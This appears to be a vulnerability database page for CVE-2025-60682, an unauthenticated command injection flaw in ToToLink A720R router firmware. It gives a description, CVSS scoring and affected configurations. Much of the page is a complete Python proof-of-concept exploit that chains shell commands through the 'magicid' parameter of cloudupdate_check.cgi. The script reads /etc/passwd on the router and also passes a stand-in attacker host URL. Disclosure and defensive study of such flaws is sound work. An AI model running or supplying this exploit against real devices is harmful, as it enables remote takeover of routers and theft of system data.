Security Vulnerability Report
CVE-2025-60682 CVSS 6.5 MEDIUM

Published: 2025-11-13 16:15:52
Last Modified: 2025-11-17 19:16:59

Description

A command injection vulnerability exists in the ToToLink A720R Router firmware V4.1.5cu.614_B20230630 within the cloudupdate_check binary, specifically in the sub_402414 function that handles cloud update parameters. User-supplied 'magicid' and 'url' values are directly concatenated into shell commands and executed via system() without any sanitization or escaping. An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary commands on the device.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:totolink:a720r_firmware:4.1.5cu.614_b20230630:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:totolink:a720r:-:*:*:*:*:*:*:* - NOT VULNERABLE
ToToLink A720R V4.1.5cu.614_B20230630

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# CVE-2025-60682 PoC - ToToLink A720R Command Injection
# Affected: ToToLink A720R Router Firmware V4.1.5cu.614_B20230630

import requests
import sys

TARGET_IP = "192.168.1.1"  # Router IP address
TARGET_PORT = 80


def exploit_command_injection(target_ip, command):
    """
    Exploit the command injection vulnerability in cloudupdate_check
    via magicid and url parameters
    """
    # Construct malicious payload
    # Using semicolon to chain commands
    payload = f";{command}"

    # Target URL for cloud update check
    url = f"http://{target_ip}:{TARGET_PORT}/cgi-bin/cloudupdate_check.cgi"

    # Prepare malicious parameters
    params = {
        "magicid": payload,
        "url": "http://attacker.com/firmware.bin",
    }

    try:
        # Send exploit request (unauthenticated)
        response = requests.get(url, params=params, timeout=10)
        print(f"[*] Request sent to {url}")
        print(f"[*] Payload: {payload}")
        print(f"[*] Response status: {response.status_code}")
        return response.text
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")
        return None


def main():
    if len(sys.argv) > 1:
        target_ip = sys.argv[1]
    else:
        target_ip = TARGET_IP

    print("[*] CVE-2025-60682 - ToToLink A720R Command Injection")
    print(f"[*] Target: {target_ip}")

    # Example: Execute 'id' command to verify vulnerability
    print("\n[*] Testing with 'id' command...")
    result = exploit_command_injection(target_ip, "id")
    if result:
        print("[+] Response received")

    # Example: Read /etc/passwd
    print("\n[*] Reading /etc/passwd...")
    result = exploit_command_injection(target_ip, "cat /etc/passwd")
    if result:
        print(result)


if __name__ == "__main__":
    main()

References

http://totolink.com (Broken Link)
https://github.com/yifan20020708/SGTaint-0-day/blob/main/ToToLink/ToToLink-A720R/CVE-2025-60682.md (Exploit, Third Party Advisory)
https://www.totolink.net/ (Product)

Weakness: CWE-77